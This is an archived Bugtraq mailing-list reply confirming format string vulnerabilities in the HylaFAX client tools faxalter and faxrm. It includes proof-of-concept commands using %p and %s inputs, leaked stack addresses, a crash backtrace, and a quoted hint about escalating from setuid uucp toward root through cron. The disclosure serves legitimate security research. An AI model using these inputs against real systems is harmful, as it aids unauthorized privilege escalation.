[22727] in bugtraq
Re: hylafax
daemon@ATHENA.MIT.EDU (KF)
Tue Sep 25 01:37:12 2001
Message-ID: <39B3633B.2AB6F94F@snosoft.com>
Date: Mon, 04 Sep 2000 04:54:19 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: christer.oberg@gmx.net
Cc: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Same deal on Mandrake 8.0...
hylafax-client-4.1-5mdk.i586.rpm
[root@linux /root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586
[root@linux /root]# ls -al /usr/bin/faxalter
-rwxr-xr-x 1 root root 13380 Aug 6 2001
/usr/bin/faxalter*
[root@linux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1
0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown
host
[root@linux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1
Segmentation fault (core dumped)
[root@linux elguapo]# gdb /usr/bin/faxalter core
(gdb) bt
#0 0x40209ab7 in vfprintf () from /lib/libc.so.6
#1 0x4020d0f0 in vfprintf () from /lib/libc.so.6
#2 0x40207d7b in vfprintf () from /lib/libc.so.6
#3 0x40066509 in FaxClient::vprintError () from
/usr/lib/libfaxutil.so.4.0.1
-KF
>
> There are some format strings vulnerbilities in the lastest hylafax package
> try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
> Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
> port collection). uid uucp is not that exciting but with some luck you'll
> find uucp owned binaries running from cron with uid 0.
>
> --
> Sent through GMX FreeMail - http://www.gmx.net
